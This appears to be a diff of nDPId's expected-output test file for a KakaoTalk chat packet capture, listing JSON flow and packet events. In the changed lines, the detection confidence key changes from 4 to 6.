{"query":"up-gp.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1430069022252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022252,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBqEUANQAtOYa3iAEAAAEAAAAAAAAEZG4tbAR0YWxrBWtha2FvA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"dn-l.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1430069022282,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022282,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb2AAANREBGQq8AQEKGFK8ADVxZQBYBjqn1YGAAAEAAgAAAAAEdXAtYQR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFwgAPBHVwLWEEdGFsawJnbMAWwDEAAQABAAAARAAE0mfwEA=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022282,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022282,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":97,"pkt_l4_len":61,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFHtewAANREvkAq8AQEKGFK8ADWoRQA9yiS3iIGAAAEAAQAAAAAEZG4tbAR0YWxrBWtha2FvA2NvbQAAAQABwAwAAQABAAAEOQAEbkyNVg=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":126,"pkt_l4_len":90,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAG4b2QAANREBFgq8AQEKGFK8ADViHQBaJnpwlYGAAAEAAgAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABasAEAV1cC1ncAR0YWxrAmdswBfAMgABAAEAAACsAARuTI0a"} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="} 
@@ -72,85 +72,85 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"} 
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB7lMANQAt50i5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBEUGwoYUrwKvL8B7lMANQAtKUi5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1430069030115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":119,"pkt_l4_len":83,"thread_ts_msec":1430069030115,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGccBgAANREA8Aq8AQEKGFK8ADXuUwBTwyO5OoGAAAEAAgAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAHYwAKBHBsdXMCZ2zAFsAxAAEAAQAAAQkABNJn8A8="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030115,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030115,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 
00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069030119,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":119,"pkt_l4_len":83,"thread_ts_msec":1430069030119,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGf90QAANRFhIwq8vwEKGFK8ADXuUwBTEye5OoGAAAEAAgAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAADlQAKBHBsdXMCZ2zAFsAxAAEAAQAAAMkABNJn8A8="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3} 